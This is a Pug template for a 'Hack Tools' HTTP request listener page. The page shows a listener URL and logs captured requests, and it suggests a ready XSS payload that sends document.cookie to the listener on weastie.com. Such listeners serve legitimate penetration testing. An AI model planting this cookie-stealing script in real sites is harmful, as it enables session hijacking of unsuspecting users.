extends ../../core/template.pug

block headExtra
	title=global.essentials.formatTitle(['Hack Tools', 'Listener'])

block content
	h1 HTTP Request Listener
	if data.full
		p(style='color: red')
			| This listener has been filled up with more than 100kb of data! What is wrong with you!
			| No more data may be added to this listener to prevent a DOS attack. If you are a human,&nbsp;
			| feel free to create another listener.
		hr
	p Listening to requests at&nbsp;
		a(href=(global.path.join('/l/', id, '/')))=(global.path.join('/l/', id, '/'))
	p Listener expires at:&nbsp;
		span.formatDate=(data.createdAt.getTime() + 1000*60*60*48)
	p Try this as an XSS: 
		pre
			- var loc = '"//weastie.com/l/' + id + '/"'
			| &lt;script&gt;
			| 	var xml = new XMLHttpRequest();
			|	xml.open('GET', #{loc} + encodeURIComponent(document.cookie));
			|	xml.send();
			| &lt;/script&gt;
	hr
	h3 Requests:
	input(type='button', value='Refresh', onclick='window.location.reload()').btn.btnRaised.btnBlue
	div
		p.
			=============
		if data.requests.length > 0
			each req in data.requests
				p Request at:&nbsp;
					span.formatDate=req.date
				p IP Address: #{req.ip}
				p #{req.method}: #{decodeURIComponent(req.path)}
				p Body: #{JSON.stringify(req.body)}
				p.
					=============
		else
			p No requests yet!
